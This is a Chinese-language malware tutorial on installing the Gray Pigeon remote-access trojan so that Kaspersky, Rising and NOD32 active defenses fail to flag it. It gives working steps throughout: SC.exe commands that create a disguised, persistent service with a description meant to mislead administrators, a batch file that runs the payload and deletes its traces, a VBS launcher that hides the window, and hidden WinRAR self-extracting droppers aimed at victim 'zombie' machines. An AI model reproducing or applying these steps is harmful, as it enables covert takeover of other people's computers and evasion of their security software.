轻松过所有杀软主动防御.txt

轻松过所有杀软主动防御

利用下面方法可以过任何杀软的主动防御，并且不用修改时间：
首先是需要准备的工具：
１.鸽子服务端
２.系统自带的SC.EXE服务添加修改工具
３．winrar
４．icesword

为了让教程更小一些我把字都打好了～

一．首先我们来配置一个鸽子，配置的时候要注意下．．．安装选项这里的安装路径，大家一定要记得哦！然后把下面的那些选项全部都取消掉，注册表和服务启动也不要，插进程隐藏服务端进程也不要选～

具体看操作吧~

好了，鸽子配置好了，大家就简单的做下免杀，免杀不在今天的教程范围内，我就不操作了，这里就用我配置好的服务端来示范吧！

暂时是全过的，瑞星、卡巴、NOD32都过了  呵呵。。都是最新的病毒库  我们来运行看下~  瑞星卡了吧~卡巴也卡了~ NOD32上线~呵呵。。。看来瑞星和卡巴的主动还是蛮厉害的，我们现在就来让他们的主动也实效~ 先卸载掉

二．用SC来添加服务

运行CMD.EXE 在system32的目录下运行执行 
     
     SC.exe create services BinPath= "%systemroot%\twain.exe" type= own type= interact start= auto DisplayName= "services"
    用SC建立一个服务，服务名为services，路径Binpath为"%systemroot%\twain.exe"，（这里的服务指向路径很重要！一定要和在配置鸽子的时候安装路径一样，否则无法按照此方法上线！）类型type为 own 与interact交互，启动类型start为自动，显示名DisplayName为"services"。
     sc.exe description services "Retrieves the serial number of any portable media player connected to this computer. If this service is stopped, protected content might not be down loaded to the device."
‘这句是将services服务的描述改为“Retrieves the serial number of any portable media player connected to this computer. If this service is stopped, protected content might not be down loaded to the device.”  改这么长是用来迷惑管理员的：）
     sc config wuauserv depend= services
‘配置services使wuauserv服务依存此服务（wuauserv可以根据自己喜欢改成其它服务，这里的wuauserv是系统在Windows Update网站的自动更新服务）。
___________________________________________________________________________________________以上添加服务的方法是根据一位朋友的打造不死鸽子的教程里说明做的，在此谢谢这位朋友了：） 呵呵。

添加服务成功了，我们来看看注册表~这就是我们刚添加的服务，我这里因为系统是在D盘，所以要修改下~然后导出去，命名为fuwu.reg


三．创建一个bat文件,命名为bat.bat
@echo off   //隐藏BAT运行窗口
@regedit /s %systemroot%\system32\fuwu.reg   //运行添加服务到注册表
 @%systemroot%\system32\run.exe    //运行服务端
 @del /q /f /s %systemroot%\system32\fuwu.reg  
 @del /q /f /s %systemroot%\system32\run.exe
 @del /q /f /s %systemroot%\system32\bat.vbs
 @del /q /f /s %systemroot%\system32\bat.bat

虽然@echo off可以隐藏bat运行窗口，但DOS窗口还是会闪一下，我们就要用VBS来隐藏了

四．创建一个VBS文件，目的是要隐藏让我们的BAT运行窗口
Set ws = CreateObject("Wscript.Shell") 
ws.run "cmd /c bat.bat",vbhide 

五．最重要的一步！大家都知道，就算鸽子免杀做的再好，表面和内存都能过，但是在你运行的时候卡巴和瑞星的主动防御还是会报警吧？我们现在要做的就是让他们的主动防御都失效，并且不用更改时间和Ｋ进程！大家来看我操作～
在虚拟机里运行我刚免杀的鸽子，ＮＯＤ３２没有报警，现在我们来找安装路径的鸽子文件，就是这个了，现在我们把它复制出来，直接复制好像行不通，现在我们就要用到icesword了，看操作．．．好了文件复制出来了，命名为twain.exe(服务指向的程序名)　我们先把服务端卸载掉  改下文件属性  我们现在来用winrar压缩．．．制作自解压文件，解压路径：%systemroot%\　　跟服务指向的路径一样，模式全部隐藏，覆盖所有文件，自解压文件命名为run.exe

六．现在把我们做好的几个文件fuwu.reg  run.exe  bat.bat  bat.vbs用winrar压缩，制作自解压文件，解压路径：%systemroot%\system32\　解压后运行bat.vbs，模式选全部隐藏，覆盖所有文件．．．这样我们的服务端就做好了，大家可以自行修改下压缩包，把＂用winrar打开＂这项给取消掉，这里我就不演示了．

我们来测试下上线效果~ 没有吧，我们到虚拟机上测试   卡巴没卡了：） NOD32不用说~

NOD32上线  卡巴上线~ 

呵呵。。成功了吧，瑞星也和卡巴一样哦，只要你的鸽子免杀了，就没有任何提示哦~

这个方法虽然能过杀软的主动，但是缺点就是服务不是立刻生效的，必须等到肉鸡重启后才能正常上线．